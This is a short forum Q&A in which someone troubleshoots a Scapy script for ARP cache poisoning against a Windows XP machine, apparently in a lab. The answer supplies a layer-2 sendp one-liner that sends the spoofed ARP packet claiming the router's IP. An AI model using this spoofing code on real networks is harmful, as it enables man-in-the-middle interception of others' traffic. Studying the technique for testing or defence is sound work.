Scapy arp poisoning not working for me

Question

I am attacking a Windows XP machine with Backtrack 5 using scapy.

Now that's my code:

#! /usr/bin/env python

from scapy.all import *

arp_p = ARP(op = 1, psrc = "192.168.0.1", pdst = "192.168.0.106", hwsrc = "00:0c:29:f0:2d:19", hwdst = "ff:ff:ff:ff:ff:ff)
send(arp_p)

The code above actually sends two packets for some reason. One time my backtrack mac is asking:

who has 192.168.0.106 (Victim's IP) ? Tell 192.168.0.108 (Backtrack's IP - NOT SUPPOSED TO BE!) .

Then he gets the "is at" answer from the victim.

And the second time my backtrack's mac is asking:

who has 192.168.0.106 (Victim's IP) ? Tell 192.168.0.1 (The router's IP).

Then he gets the "is at" answer from the victim again.

Then the victim's ARP table has to lines of the same mac but different IPs, one is the Backtrack's real IP and the second is the router's IP.

Why is this happenning?

Answer 1

The first ARP packet you see comes from Scapy, because it wants to fill the Ether frame with the Victim's MAC address before send() -ing your ARP packet.

If you don't want that to happen, try ( sendp sends at layer 2):

>>> sendp(Ether(dst=ETHER_BROADCAST)/ARP(psrc = "192.168.0.1", pdst = "192.168.0.106"))

You can replace ETHER_BROADCAST with your victim's MAC address, that's less "noisy".